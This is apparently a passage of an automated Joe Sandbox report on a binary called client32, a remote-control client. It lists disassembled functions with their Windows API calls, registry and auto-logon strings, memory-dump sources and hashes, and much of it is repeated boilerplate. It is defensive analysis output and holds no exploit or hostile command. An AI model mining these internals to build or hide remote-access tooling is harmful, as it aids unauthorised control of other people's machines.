                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset$CriticalInitializeSection_free
                                                                              • String ID: ..\CTL32\EncryptFuncs.cpp$1 + (int) strlen(pszEnc64) < maxlen$pDES
                                                                              • API String ID: 1034327355-3728095610
                                                                              • Opcode ID: 3f0fc10add862ae414e317733b7acb466fe5994ab9f005323c3292fa7598b23a
                                                                              • Instruction ID: c1f7332507345231af31a21f52458b70e12c39c0646f21d409442dfd5e8f1256
                                                                              • Opcode Fuzzy Hash: 3f0fc10add862ae414e317733b7acb466fe5994ab9f005323c3292fa7598b23a
                                                                              • Instruction Fuzzy Hash: 4241F375E44259ABDB10DF64DC81FEEB7B8FB44708F048199E949A7280EF30AA45CBD0
                                                                              Function 110340F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 11034143
                                                                              • SendMessageA.USER32(?,00000149,00000000,00000000), ref: 11034169
                                                                              • SendMessageA.USER32(?,00000148,00000000,?), ref: 1103418D
                                                                              • _strncmp.LIBCMT ref: 110341F2
                                                                              Strings
                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~., xrefs: 11034125
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$_strncmp
                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~.
                                                                              • API String ID: 3653864897-2723064302
                                                                              • Opcode ID: 680e87131231ae9ffb9cf99bbd5bd076bdec894dc419f91c3127ba1ad2c6fc09
                                                                              • Instruction ID: 9942400da876c73c2006ff64abc8c5ab83d7dcf65f92b9753e668e4276fd9f94
                                                                              • Opcode Fuzzy Hash: 680e87131231ae9ffb9cf99bbd5bd076bdec894dc419f91c3127ba1ad2c6fc09
                                                                              • Instruction Fuzzy Hash: 4B413B39E105595FC712CEB49C80BBABBFD9BC1316F4542D4E818EF290DA31DA48CB40
                                                                              Function 1105A390 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,00020019,00000000,?,?), ref: 1105A410
                                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,00000000,?,?,?,?,?,?), ref: 1105A46F
                                                                              • RegEnumValueA.ADVAPI32(00000000,00000001,?,?,00000000,?,?,?,?,?), ref: 1105A4E1
                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 1105A4EE
                                                                              Strings
                                                                              • SOFTWARE\Productive Computer Insight\Client32\AutoReconnect, xrefs: 1105A3C9, 1105A404
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumValue$CloseOpen
                                                                              • String ID: SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                                              • API String ID: 3785232357-4133889954
                                                                              • Opcode ID: 35184cea920729339416c2335192d7caa9066917f2ad41aee8609c076480c5ef
                                                                              • Instruction ID: f381cdfbe810446fdbc5c8e37418f05d32ec82583775adbbf3ad437ea623cab8
                                                                              • Opcode Fuzzy Hash: 35184cea920729339416c2335192d7caa9066917f2ad41aee8609c076480c5ef
                                                                              • Instruction Fuzzy Hash: 44415572E51229AFEB64CF94CC91FDAB7B8EB89704F0042D9E60D97180EB705A84CF51
                                                                              Function 11146370 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID: %s: $CLIENT32
                                                                              • API String ID: 4139908857-407627211
                                                                              • Opcode ID: bbfd822ea36ec1217a5ea76a287d4667e02058545888def00001442b4b624510
                                                                              • Instruction ID: af445439b6752a8968c272d87336ee6d3db593790a582df571d11f25a3ee04be
                                                                              • Opcode Fuzzy Hash: bbfd822ea36ec1217a5ea76a287d4667e02058545888def00001442b4b624510
                                                                              • Instruction Fuzzy Hash: C241493550016ADBCB11CF24DC58AEEFBB9EF4630DF1486A4E82987680DB71964DCF90
                                                                              Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                              • EqualRect.USER32(?,?), ref: 1107740C
                                                                              • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                              • m_hWnd, xrefs: 11077447
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$DeferEqualPointsRect
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2754115966-2830328467
                                                                              • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                              • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                              • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                              • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                              Function 11110530 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,AB86ACF8,?,?), ref: 11110564
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1111059E
                                                                              • SetEvent.KERNEL32(?), ref: 111105C9
                                                                              • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 11110604
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
                                                                              • String ID: list<T> too long
                                                                              • API String ID: 930337060-4027344264
                                                                              • Opcode ID: 0c55eadfd423d2968db6c31403b43634406423df5f7b4fd19a2904cad33ae44a
                                                                              • Instruction ID: 7bfaceea9a20e34aca0a829f3d9254b0af8797b3eeddb6bd678ff8280e03d006
                                                                              • Opcode Fuzzy Hash: 0c55eadfd423d2968db6c31403b43634406423df5f7b4fd19a2904cad33ae44a
                                                                              • Instruction Fuzzy Hash: C6314175A047059FD714CF64C984B56FBF9FB49314F10862EE8569BA44DB30F844CB51
                                                                              Function 11146190 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              • GetSysColor.USER32(0000000F), ref: 111461A9
                                                                              • LoadBitmapA.USER32(00000000,00000000), ref: 111461BF
                                                                              • SendDlgItemMessageA.USER32(00000000,00003A97,00000172,00000000,00000000), ref: 111461FB
                                                                              Strings
                                                                              • ..\ctl32\util.cpp, xrefs: 111461D9
                                                                              • hGrip || !"Unable to load sizing grip bitmap", xrefs: 111461DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad$AddressBitmapColorDefaultFreeItemLangMessageProcSendSystemVersion_memset
                                                                              • String ID: ..\ctl32\util.cpp$hGrip || !"Unable to load sizing grip bitmap"
                                                                              • API String ID: 1044520585-3315463184
                                                                              • Opcode ID: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
                                                                              • Instruction ID: 8e565c128ad7df1c8f5e5c04fb88379ac646e9871c4513a0e4d424585abd715b
                                                                              • Opcode Fuzzy Hash: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
                                                                              • Instruction Fuzzy Hash: 0DF0BB79A4032577E61456F19D05FEBBA5C9B44F5DF004430FE19A7A82DE78D900C3E5
                                                                              Function 11004210 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000060C,00000002,00000000), ref: 1100422E
                                                                              • Sleep.KERNEL32(00000064), ref: 11004236
                                                                              • SendMessageA.USER32(?,0000060C,00000003,00000000), ref: 11004249
                                                                              Strings
                                                                              • m_pToolbar, xrefs: 1100425F
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 1100425A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$Sleep
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
                                                                              • API String ID: 2158920685-281161189
                                                                              • Opcode ID: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
                                                                              • Instruction ID: e130d243a18c05c63e38ab9a554661a07bf0098fc6b996864d1fadb4c15248a9
                                                                              • Opcode Fuzzy Hash: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
                                                                              • Instruction Fuzzy Hash: B4F0A435B80710AFE228EBA0DC45F47B3E6BBC8704F014214F6119B691D770A901CB44
                                                                              Function 110F62E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000001,11107408,?,?,00000000,?,00000104,?,1110809F), ref: 110F62F1
                                                                              • InterlockedExchange.KERNEL32(00000034,00000000), ref: 110F62FD
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,00000104,?,1110809F), ref: 110F6308
                                                                              • InterlockedIncrement.KERNEL32(111F15FC), ref: 110F6335
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$CloseExchangeHandleIncrementObjectSingleWait
                                                                              • String ID: s%d client died, u=%s
                                                                              • API String ID: 174804551-366056384
                                                                              • Opcode ID: c192f3d5bca484a890637941cdb3a7630fb987d5b52ec21a0ba5dd43187fcfb3
                                                                              • Instruction ID: 551c94e3cc5d53289c1f75ee3767d4d5f8739e99a0362a2e2ac3a71050f0140c
                                                                              • Opcode Fuzzy Hash: c192f3d5bca484a890637941cdb3a7630fb987d5b52ec21a0ba5dd43187fcfb3
                                                                              • Instruction Fuzzy Hash: 7EF0B475600216ABF7208AB4EE89FD7B7ECEF06708F010869F852D3A04D730E444CB21
                                                                              Function 11034360 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 11034378
                                                                              • GetClassNameA.USER32(?,?,00000400), ref: 110343A6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
                                                                              • String ID: CltAutoLogon.cpp$Edit$IsWindow(hWin)
                                                                              • API String ID: 2713866921-406224758
                                                                              • Opcode ID: 7905da4c080bb9fbcb2ea404f06bf2458b3badafe63713af4a017f97f9c02a33
                                                                              • Instruction ID: de5463733f4b21b7b592fd3ca8503f00e7fd8ffd50b0e49cc7191f6a28a46f2f
                                                                              • Opcode Fuzzy Hash: 7905da4c080bb9fbcb2ea404f06bf2458b3badafe63713af4a017f97f9c02a33
                                                                              • Instruction Fuzzy Hash: 12F0B4B5A4122D6BDB00DF649D01FEEF76C9F45209F0000A8EB15AB181EB746A05CBD9
                                                                              Function 11034260 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 11034278
                                                                              • GetClassNameA.USER32(?,?,00000400), ref: 110342A6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
